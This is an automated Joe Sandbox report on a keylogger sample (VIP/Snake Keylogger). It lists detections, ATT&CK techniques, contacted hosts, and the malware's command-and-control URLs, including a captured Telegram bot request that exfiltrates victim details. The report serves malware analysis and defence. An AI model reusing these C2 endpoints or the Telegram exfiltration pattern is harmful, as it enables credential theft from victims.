                          Source: Yara matchFile source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
                          Yara detected VIP Keylogger
                          Source: Yara matchFile source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                          DLL Side-Loading                          		1
                          Process Injection                          		1
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		1
                          Query Registry                          		Remote Services1
                          Email Collection                          		1
                          Web Service                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                          DLL Side-Loading                          		41
                          Virtualization/Sandbox Evasion                          		LSASS Memory21
                          Security Software Discovery                          		Remote Desktop Protocol11
                          Archive Collected Data                          		11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                          Process Injection                          		Security Account Manager1
                          Process Discovery                          		SMB/Windows Admin Shares1
                          Data from Local System                          		3
                          Ingress Tool Transfer                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Deobfuscate/Decode Files or Information                          		NTDS41
                          Virtualization/Sandbox Evasion                          		Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                          Obfuscated Files or Information                          		LSA Secrets1
                          Application Window Discovery                          		SSHKeylogging14
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading                          		Cached Domain Credentials1
                          System Network Configuration Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
                          System Information Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe66%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                          1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe100%AviraHEUR/AGEN.1307591
                          1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe100%Joe Sandbox ML

                          Dropped Files

                          No Antivirus matches

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                          http://upx.sf.net0%URL Reputationsafe
                          http://checkip.dyndns.org0%URL Reputationsafe
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                          https://www.ecosia.org/newtab/0%URL Reputationsafe
                          http://varders.kozow.com:80810%URL Reputationsafe
                          http://aborters.duckdns.org:8081100%URL Reputationmalware
                          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                          http://checkip.dyndns.org/0%URL Reputationsafe
                          http://anotherarmy.dns.army:8081100%URL Reputationmalware
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                          http://checkip.dyndns.org/q0%URL Reputationsafe
                          https://reallyfreegeoip.org0%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                          https://reallyfreegeoip.org/xml/0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          reallyfreegeoip.org
                          		188.114.97.3
                          		truetrue
                            		unknown
                            api.telegram.org
                            		149.154.167.220
                            		truetrue
                              		unknown
                              checkip.dyndns.com
                              		158.101.44.242
                              		truefalse
                                		unknown
                                checkip.dyndns.org
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://reallyfreegeoip.org/xml/8.46.123.33false
                                    		unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2027/09/2024%20/%2015:33:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                      		unknown
                                      http://checkip.dyndns.org/false
                                      • URL Reputation: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.office.com/1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://duckduckgo.com/chrome_newtab1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.telegram.org1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://api.telegram.org/bot1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exefalse
                                                		unknown
                                                https://chrome.google.com/webstore?hl=enXL1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.office.com/lB1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://upx.sf.netAmcache.hve.12.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://checkip.dyndns.org1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://chrome.google.com/webstore?hl=en1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C08000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.ecosia.org/newtab/1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://varders.kozow.com:80811727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exefalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://aborters.duckdns.org:80811727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exetrue
                                                        • URL Reputation: malware
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://reallyfreegeoip.org/xml/8.46.123.33$1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://anotherarmy.dns.army:80811727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exetrue
                                                          • URL Reputation: malware
                                                          		unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://checkip.dyndns.org/q1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exefalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://chrome.google.com/webstore?hl=enlB1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://reallyfreegeoip.org1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.office.com/XL1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exefalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://reallyfreegeoip.org/xml/1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exefalse
                                                              • URL Reputation: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              149.154.167.220
                                                              		api.telegram.orgUnited Kingdom
                                                              		62041TELEGRAMRUtrue
                                                              188.114.97.3
                                                              		reallyfreegeoip.orgEuropean Union
                                                              		13335CLOUDFLARENETUStrue
                                                              158.101.44.242
                                                              		checkip.dyndns.comUnited States
                                                              		31898ORACLE-BMC-31898USfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1520417
                                                              Start date and time:2024-09-27 10:46:36 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 4m 57s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:19
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.winEXE@2/5@3/3
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 66
                                                              • Number of non-executed functions: 38
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                              • VT rate limit hit for: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              04:47:29API Interceptor98x Sleep call for process: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe modified
                                                              05:56:44API Interceptor1x Sleep call for process: WerFault.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              149.154.167.220#docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  188.114.97.3QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • filetransfer.io/data-package/mfctuvFf/download
                                                                                  http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • brawllstars.ru/
                                                                                  http://aktiivasi-paylaterr.from-resmi.com/Get hashmaliciousUnknownBrowse
                                                                                  • aktiivasi-paylaterr.from-resmi.com/
                                                                                  ECChG5eWfZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  • homker11.uebki.one/GeneratorTest.php
                                                                                  HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                                                  QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • filetransfer.io/data-package/Ky4pZ0WB/download
                                                                                  ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.1win-moldovia.fun/1g7m/
                                                                                  http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                                                                                  • www.tiktok758.com/img/logo.4c830710.svg
                                                                                  TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                                                                                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rtprajalojago.live/2wnz/
                                                                                  158.101.44.242Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  dekont.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/
                                                                                  Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • checkip.dyndns.org/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  reallyfreegeoip.orgPayment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  dekont.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  checkip.dyndns.comPayment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  dekont.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  api.telegram.org#docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  • 149.154.167.220
                                                                                  z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
